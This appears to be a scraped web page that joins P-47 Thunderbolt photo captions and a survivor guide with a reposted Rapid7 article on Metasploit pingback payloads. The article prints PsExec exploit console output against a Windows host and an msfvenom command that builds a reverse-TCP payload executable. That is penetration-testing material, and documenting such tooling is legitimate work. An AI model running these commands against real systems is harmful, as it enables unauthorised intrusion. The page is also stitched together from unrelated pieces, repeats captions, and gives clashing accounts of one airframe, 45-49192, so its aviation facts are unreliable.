Nellie by Treflyn Lloyd-Roberts Via Flickr: P-47 Thunderbolt "Nellie" performs a nice topside pass for the crowds at Sywell during the 2024 Air Show. Aircraft: Republic P-47D Thunderbolt 45-49192 (G-THUN) painted as F4-J "Nellie", of 492nd Fighter Squadron, 48th Fighter Group. Location: Sywell Aerodrome (ORM/EGBK), Northamptonshire, UK.

P47 D G-THUN 45-49192 "no guts no Glory" Colmar Meyenheim juin 2002 by paul SCHALLER

stu norris Following

P-47D Thunderbolt 45-49192 G-THUN - "Nellie" - Fighter Aviation Ltd

Pete Kynsey displaying "Nellie" at The Shuttleworth Collection Military Pageant 2018. The aircraft wears the markings of the 492nd Fighter Squadron USAAF.

45-49192 (G-THUN) 1945 Republic P-47D Thunderbolt Duxford 28.03.19 by Phil Rawlings

Airworthy P-47 Thunderbolts, 2017

A short guide to the survivors, and how to quickly identify them.

Balls Out, 44-32817, Lewis Air Legends

Red cowling, red cockpit frame, red bars on wingtips, horizontal stabilizers and fin; aircraft code G9-L.  This aircraft served in the Venezuelan Air Force from 1949, and eventually returned to the US in 1995.  She is based out of San Antonio, Texas.

Tarheel Hal, 44-90368, Lone Star Flight Museum

Orange fin and rear fuselage, invasion stripes on underside of rear fuselage and inner wings, distinctive orange/yellow/blue nose art, aircraft code IA-N; this paint scheme was worn by an identical aircraft of the 358th Fighter Group.  This aircraft was sold to the Venezuelan Air Force after WWII and returned in the 1990s for restoration.  She is based out of Galveston, Texas.

Wicked Wabbit, 44-90438, Tennessee Museum of Aviation

Red cowling ring, olive drab top fuselage, yellow bands on outer wing panels and fin, aircraft code 44; she wears the paint scheme of an identical aircraft of the 57th Fighter Group.  This aircraft was sold to the Yugoslav Air Force after the end of the war and returned to the US in 1986 for restoration.  She is based out of Sevierville, Tennessee, with her squadron mate

Hun Hunter XVI, 44-90460, Tennessee Museum of Aviation

Red cowling ring, olive drab top fuselage, yellow bands on the outer wings and fin, aircraft code 40; she wears the paint scheme of an identical aircraft of the 57th Fighter Group.  This aircraft was sold to Brazil in the 1950s and returned to the US in 1988 for restoration.  She is based out of Sevierville, Tennessee.

Hairless Joe, 44-90471, Erickson Aircraft Collection

Mottled grey-green fuselage and wings, invasion stripes on the lower rear fuselage and wings, red cowling ring, aircraft code LM-S; she wears the paint scheme of an identical aircraft of the 56th Fighter Group.  This aircraft was sold to the Peruvian Air Force and returned in to the US 1969.  She is based out of Madras, Oregon.

No Guts, No Glory, 45-49192, Claire Aviation Inc

Black-and-white checkerboard cowling, invasion stripes on the upper and lower wings and rear fuselage, black band on fin, aircraft code XM-X; she wears the colors of an identical aircraft of the 82nd Fighter Squadron.  This aircraft was sold to Peru and returned to the US in 1969 for restoration.  She is based out of Wilmington, Delaware.

Squirt VIII, 45-49205, Palm Springs Air Museum

Dark green fuselage, white cowling ring, white band on fin, invasion stripes on the lower wings and rear fuselage, aircraft code 2Z-P.  This aircraft was sold to the Peruvian Air Force and returned to the US in 1969 for restoration.  She is based out of Palm Springs, California.

45-49346, Yanks Air Museum

Unpainted except for national insignia and tail number, the Yanks Air Museum P-47D is one of few unpainted airworthy survivors.  She is based out of Chino, California, along with

42-27385, Yanks Air Museum

Unpainted except for national insignia and tail number, she is a rare prototype YP-47M.  The aircraft is based out of Chino, California.

45-49385, Westpac Restorations

Black-and-white checkerboard cowling, black band on fin, invasion stripes on lower wings and fuselage, aircraft codes WZ-A (port) and B-WZ (starboard).  The aircraft was sold to the Peruvian Air Force and returned to the US in 1969 for restoration.  She is based out of Colorado Springs, Colorado.

Tallahassee Lassie, 45-49406, Flying Heritage Collection

Blue cowling ring, blue cockpit frame, blue bands on horizontal stabilizers and fin, aircraft code 2Z-T; she wears the paint scheme of an identical aircraft of the 510th Fighter Squadron.  This aircraft was assigned to the ANG in 1948, removed from service soon after, and later restored.  She is based out of Everett, Washington.

Snafu, 42-25068, Comanche Warbirds Inc.

Razorback variant.  Dark green fuselage, black-and-white checkerboard cowling, invasion stripes on upper and lower wings and rear fuselage, white bands on horizontal stabilizers and fin, aircraft code WZ-D.  This aircraft entered civilian hands immediately following the end of WWII and has remained airworthy since.  She is operated out of Houston, Texas.

Spirit of Atlantic City, NJ, 42-25254, Planes of Fame Air Museum

Razorback variant.  Dark green fuselage, white cowling ring, white bands on horizontal stabilizers and fin, invasion stripes on rear fuselage and wings (may or may not be present), aircraft code UN-M.  This aircraft has been in civilian hands since 1944.  She is based out of Chino, California.

Lil Meatie’s Meat Chopper, 44-89136, Commemorative Air Force

Unfortunately the only picture of this plane I can find is disassembled in a hangar after a 2002 crash, so I don’t know if it still is airworthy or not.  Any information regarding this aircraft would be most welcome.

Several other Thunderbolts are under restoration to airworthiness, including the wreckage of Jackie’s Revenge which was lost in May 2016 with her pilot.  

Original Post from Rapid7 Author: Brendan Watters

This week, the Metasploit team added a new feature to Framework that improves safety and offers another avenue in MSF for novel evasion techniques. We’re pleased to introduce pingback payloads: a new, non-interactive payload type that provides users with confirmation of remote execution on a target—and absolutely nothing else. Typical Metasploit sessions are interactive; users can send commands, receive data, and otherwise engage with the target. Pingback payloads, conversely, provide limited “pingback” functionality that verifies target exploitability without loading a shell.

Here’s how it works: Upon payload creation, a pingback payload is assigned a Universally Unique Identifier (UUID). In the reverse payload use case, the payload attempts to send the UUID back to the attacker a predefined number of times at a predefined interval (e.g., a pingback once every 24 hours for two weeks, or 14 times). For bind payload use cases, the payload sets up a listener that provides the UUID when someone connects to the server. After completing this task, the payload exits. No further command and control is available, and no other information is exchanged. Nowhere is data read from the connection, and only the UUID is written.

Pingback functionality increases safety and stealth in a number of ways: If there’s important data on a target server, the pen tester never saw it. If someone intercepts or sniffs the packet, it is merely a 16-byte “random” value. If a bind payload is left running by accident after a pen testing engagement and someone else connects to the open port, all that other party will get is a UUID number before the listener disappears forever.

We are constantly thinking about how to make Metasploit sessions more secure without compromising on utility and creativity for Metasploit users. In this case, rather than “add” security, we have followed the principle of least privilege and removed the value to another attacker.

Pingbacks in action

Pingback payloads are interchangeable with most other Metasploit payloads. If a user wants to prove that a target host is vulnerable (e.g., to creds they’ve obtained), but that user does not need to establish a session, they can use PsExec just like a regular payload:

msf5 exploit(windows/smb/psexec) > run [*] PingbackUUID = be8c21f6654b4fb791198ebfb318f6ea [*] Writing UUID be8c21f6654b4fb791198ebfb318f6ea to database... [*] Started reverse TCP handler on 192.168.135.168:4567 [*] 192.168.134.120:445 - Connecting to the server... [*] 192.168.134.120:445 - Authenticating to 192.168.134.120:445 as user '[REDACTED]'... [*] 192.168.134.120:445 - Checking for System32WindowsPowerShellv1.0powershell.exe [*] 192.168.134.120:445 - PowerShell found [*] 192.168.134.120:445 - Selecting PowerShell target [*] 192.168.134.120:445 - Powershell command length: 2536 [*] 192.168.134.120:445 - Executing the payload... [*] 192.168.134.120:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.120[svcctl] ... [*] 192.168.134.120:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.120[svcctl] ... [*] 192.168.134.120:445 - Obtaining a service manager handle... [*] 192.168.134.120:445 - Creating the service... [+] 192.168.134.120:445 - Successfully created the service [*] 192.168.134.120:445 - Starting the service... [+] 192.168.134.120:445 - Service start timed out, OK if running a command or non-service executable... [*] 192.168.134.120:445 - Removing the service... [+] 192.168.134.120:445 - Successfully removed the service [*] 192.168.134.120:445 - Closing service handle... [*] Pingback session 1 opened (192.168.135.168:4567 -> 192.168.134.120:49162) at 2019-07-25 13:49:27 -0500 [*] Incoming UUID = be8c21f6654b4fb791198ebfb318f6ea [+] UUID identified (be8c21f6654b4fb791198ebfb318f6ea) [*] 192.168.134.120 - Pingback session 1 closed. Reason: User exit

In this case, we created a payload with a UUID (it was added to our database), sent it to the target, and set up a listener. When we got the callback, Framework established a session long enough to receive the UUID, then exited.

A second example utilizes the PingbackRetries option and the PingbackSleep option:

tmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -p windows/x64/pingback_reverse_tcp -f exe -o test.exe LHOST=192.168.135.168 LPORT=4567 EXITFUNC=thread PINGBACKRETRIES=10 PINGBACKSLEEP=5

PingbackRetries denotes the number of times the payload will attempt to call back, while PingbackSleep defines the amount of time between callbacks.

msf5 exploit(multi/handler) > run [-] Handler failed to bind to 192.168.135.111:4567:- - [*] Started reverse TCP handler on 0.0.0.0:4567 [*] Pingback session 1 opened (192.168.135.168:4567 -> 192.168.134.120:49191) at 2019-07-25 15:35:35 -0500 [*] Incoming UUID = f87bc2a95d7f450ea54345cf48fd8829 [+] UUID identified (f87bc2a95d7f450ea54345cf48fd8829) [*] Pingback session 2 opened (192.168.135.168:4567 -> 192.168.134.120:49192) at 2019-07-25 15:35:40 -0500 [*] Incoming UUID = f87bc2a95d7f450ea54345cf48fd8829 [+] UUID identified (f87bc2a95d7f450ea54345cf48fd8829) [*] Pingback session 3 opened (192.168.135.168:4567 -> 192.168.134.120:49193) at 2019-07-25 15:35:45 -0500 [*] Incoming UUID = f87bc2a95d7f450ea54345cf48fd8829 [+] UUID identified (f87bc2a95d7f450ea54345cf48fd8829) [*] Pingback session 4 opened (192.168.135.168:4567 -> 192.168.134.120:49194) at 2019-07-25 15:35:50 -0500 [*] Incoming UUID = f87bc2a95d7f450ea54345cf48fd8829 [+] UUID identified (f87bc2a95d7f450ea54345cf48fd8829) [*] Pingback session 5 opened (192.168.135.168:4567 -> 192.168.134.120:49195) at 2019-07-25 15:35:55 -0500 [*] Incoming UUID = f87bc2a95d7f450ea54345cf48fd8829 [+] UUID identified (f87bc2a95d7f450ea54345cf48fd8829) [*] Pingback session 6 opened (192.168.135.168:4567 -> 192.168.134.120:49196) at 2019-07-25 15:36:00 -0500 [*] Incoming UUID = f87bc2a95d7f450ea54345cf48fd8829 [+] UUID identified (f87bc2a95d7f450ea54345cf48fd8829) [*] Pingback session 7 opened (192.168.135.168:4567 -> 192.168.134.120:49197) at 2019-07-25 15:36:05 -0500 [*] Incoming UUID = f87bc2a95d7f450ea54345cf48fd8829 [+] UUID identified (f87bc2a95d7f450ea54345cf48fd8829) [*] Pingback session 8 opened (192.168.135.168:4567 -> 192.168.134.120:49198) at 2019-07-25 15:36:10 -0500 [*] Incoming UUID = f87bc2a95d7f450ea54345cf48fd8829 [+] UUID identified (f87bc2a95d7f450ea54345cf48fd8829) [*] Pingback session 9 opened (192.168.135.168:4567 -> 192.168.134.120:49199) at 2019-07-25 15:36:15 -0500 [*] Incoming UUID = f87bc2a95d7f450ea54345cf48fd8829 [+] UUID identified (f87bc2a95d7f450ea54345cf48fd8829) [*] Pingback session 10 opened (192.168.135.168:4567 -> 192.168.134.120:49200) at 2019-07-25 15:36:20 -0500 [*] Incoming UUID = f87bc2a95d7f450ea54345cf48fd8829 [+] UUID identified (f87bc2a95d7f450ea54345cf48fd8829) [*] Pingback session 11 opened (192.168.135.168:4567 -> 192.168.134.120:49201) at 2019-07-25 15:36:25 -0500 [*] Incoming UUID = f87bc2a95d7f450ea54345cf48fd8829 [+] UUID identified (f87bc2a95d7f450ea54345cf48fd8829)

Notice that the source port changes each time. With Metasploit’s traditional TCP-based payloads, connections are often kept open until the user shuts down the payload. Pingback payloads, on the other hand, close the connection after sending the UUID, and reopen another connection when the user sends the UUID again. If the PingbackSleep value were 86,400 (24 hours), a pen tester could shut off their computer until the next day, restart the listener, and get the next callback as though nothing happened.

Currently, we have added 11 pingback payloads. The list below gives us a good starting set of coverage. More payloads are both possible and welcome!

cmd/unix/pingback_bind.rb cmd/unix/pingback_reverse.rb linux/x64/pingback_bind_tcp.rb linux/x64/pingback_reverse_tcp.rb python/pingback_bind_tcp.rb python/pingback_reverse_tcp.rb ruby/pingback_bind_tcp.rb ruby/pingback_reverse_tcp.rb windows/pingback_bind_tcp.rb windows/pingback_reverse_tcp.rb windows/x64/pingback_reverse_tcp.rb

One challenge we faced (and perhaps an opportunity for future work) is that this payload does not allow for post-exploitation cleanup. As such, it is incompatible with exploits placing files on the remote host. For example, the hp_autopass_license_traversal uses FileDropper to place a file on a remote host and then schedules it for cleanup. If a user attempts to use a pingback payload with the hp_autopass_license_traversal, it will fail:

msf5 exploit(windows/smb/psexec) > use exploit/windows/http/hp_autopass_license_traversal msf5 exploit(windows/http/hp_autopass_license_traversal) > set payload windows/pingback_reverse_tcp [-] The value specified for payload is not valid. msf5 exploit(windows/http/hp_autopass_license_traversal) >

As always, there are many features that would make pingbacks even better for the Framework user community, and we welcome contributions! One thing we are very excited about is that with only a 16-byte asynchronous response required, the command and control portion of pingbacks can be expanded to transports that we’ve not used previously. ICMP, ARP, hidden in existing packet slack space, and even email become possible transport mechanisms!

#gallery-0-5 { margin: auto; } #gallery-0-5 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-5 img { border: 2px solid #cfcfcf; } #gallery-0-5 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */

Go to Source Author: Brendan Watters Introducing Pingback Payloads Original Post from Rapid7 Author: Brendan Watters This week, the Metasploit team added a new feature to Framework that improves safety and offers another avenue in MSF for novel evasion techniques.

P47 D G-THUN 45-49192 "no guts no Glory" Colmar Meyenheim juin 2002 by paul SCHALLER

P47 D G-THUN 45-49192 "no guts no Glory" Colmar Meyenheim juin 2002 by paul SCHALLER

P47 D G-THUN 45-49192 "no guts no Glory" Colmar Meyenheim juin 2002 by paul SCHALLER

Jug by Treflyn Lloyd-Roberts Via Flickr: Panned shot of P-47 Thunderbolt "Nellie" as it departs from RAF Fairford. It had taken part in the static display at the 2022 Royal International Air Tattoo as part of the USAF 75th anniversary celebrations. Aircraft: Republic P-47D Thunderbolt 45-49192 painted as F4-J "Nellie", of 492nd Fighter Squadron, 48th Fighter Group. Location: RAF Fairford, Gloucestershire, UK.

Chris Murkin

Republic P-47D Thunderbolt G-THUN F4-J 549192 Nellie 45-49192 USAAF

Republic P-47D Thunderbolt G-THUN F4-J 549192 Nellie

45-49192 USAAF

This P47 was based in the USA and had Civil Registration N147PF

Friday Practice and Fly in Day Duxford Summer Air Show

Photo taken at the Imperial War Museum Duxford Cambridgeshire 23rd July 2021

ZAA_3375

Republic P-47D-40-RA Thunderbolt ‘226413 / UN-Z’ (really 45-49192) by Alan Wilson Via Flickr: c/n 399-55731. Actual US military serial 45-49192. Saw post-war service with the Peruvian Air Force as ‘545’ and later as ‘119’. Rescued and returned to the US in 1969, she flew again in 1973 registered as N47DD. Sadly, she later crashed on a delivery flight to a new owner, in February 1980. The wreck came to Duxford for the Imperial War Museum in 1985 as part of a deal arranged by the Fighter Collection and a complex static restoration took place, also involving parts of other airframes. Completed to a high standard, she is now painted to represent the personal aircraft of Colonel Hubert Zemke, commander of the 56th Fighter Group at Boxted and is on display as part of the American Air Museum, Duxford Airfield, Cambridgeshire, UK 17th October 2020

Republic P-47M Thunderbolt at the 1986 Sion Air Show by fsll2 Via Flickr: The Fighter Collection's Republic P-47M Thunderbolt 45-49192 (G-THUN) at the 1986 Sion Air Show. Scan from a 35mm slide.

P-47D Thunderbolt & P-51D Mustang, American Air Museum, Duxford. 07-5-2016 by Alan Wilson Via Flickr: A classic combination of WW2 USAAC fighters, both suspended in the newly refurbished American Air Museum The P-47 is 45-49192, c/n 399-55731 and is marked as ‘226413 / UN-Z’ The P-51 is 44-73979, c/n 122-40519 and is marked as ‘411631 / MX-V’ “Etta Jeanne II” Imperial War Museum, Duxford, Cambridgeshire, UK. 7th May 2016

Republic P-47D Thunderbolt ‘226413 / UN-Z’ (really 45-49192) by Alan Wilson Via Flickr: c/n 399-55731. Actual US military serial 45-49192. Saw post-war service with the Peruvian Air Force as ‘545’ and later as ‘119’. Rescued and returned to the US in 1969, she flew again in 1973 registered as N47DD. Sadly, she later crashed on a delivery flight to a new owner, in February 1980. The wreck came to Duxford in 1985 as part of a deal arranged by the Fighter Collection, and a complex static restoration took place, also involving parts of other airframes. Completed to a high standard, she is now painted to represent the personal aircraft of Colonel Hubert Zemke, commander of the 56th Fighter Group at Boxted and is on display in the newly refurbished American Air Museum, part of the Imperial War Museum at Duxford, Cambridgeshire, UK. 7th May 2016